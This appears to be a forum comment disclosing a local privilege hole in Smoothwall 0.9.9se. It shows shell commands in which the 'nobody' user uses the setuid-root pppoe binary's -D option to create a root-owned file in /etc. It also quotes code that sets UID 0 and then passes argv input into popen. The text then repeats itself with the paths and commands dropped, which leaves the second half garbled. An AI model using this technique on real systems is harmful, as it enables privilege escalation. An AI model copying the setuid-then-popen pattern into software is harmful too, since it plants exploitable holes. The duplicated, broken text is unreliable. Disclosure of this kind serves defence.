Comment Yet another smoothwall security hole (Score 5, Informative) 296
Just downloaded smoothwall 0.9.9se and had a search on google.
bash$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody),14(smoothwa)
bash$ ls -l /usr/sbin/pppoe
-rwsr-x--- 1 root nobody 23888 Aug 6 12:36 /usr/sbin/pppoe
bash$ /usr/sbin/pppoe -D /etc/test
bash$ ls -l /etc/test
-rw-rw-r-- 1 root nobody 367 Jan 10 03:11 /etc/test
Though it's not surprising it's full of holes with code that the smoothwall people write:
...
if (setgid(0)) { fprintf(stderr, "Couldn't set GID to 0\n"); return 0; }
if (setuid(0)) { fprintf(stderr, "Couldn't set UID to 0\n"); return 0; }
...
snprintf(command, STRING_SIZE - 1, "/var/patches/%s/setup", argv[1]);
if (!(p = popen(command, "r")))
return -1;
etc. etc.
It's full of setgid(0);setuid(0);system(command);
absolutely unbelievable.
bash$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody),14(smoothwa)
bash$ ls -l
-rwsr-x--- 1 root nobody 23888 Aug 6 12:36
bash$
bash$ ls -l
-rw-rw-r-- 1 root nobody 367 Jan 10 03:11
Though it's not surprising it's full of holes with code that the smoothwall people write:
...
if (setgid(0)) { fprintf(stderr, "Couldn't set GID to 0\n"); return 0; }
if (setuid(0)) { fprintf(stderr, "Couldn't set UID to 0\n"); return 0; }
...
snprintf(command, STRING_SIZE - 1, "/var/patches/%s/setup", argv[1]);
if (!(p = popen(command, "r")))
return -1;
etc. etc.
It's full of setgid(0);setuid(0);system(command);
absolutely unbelievable.
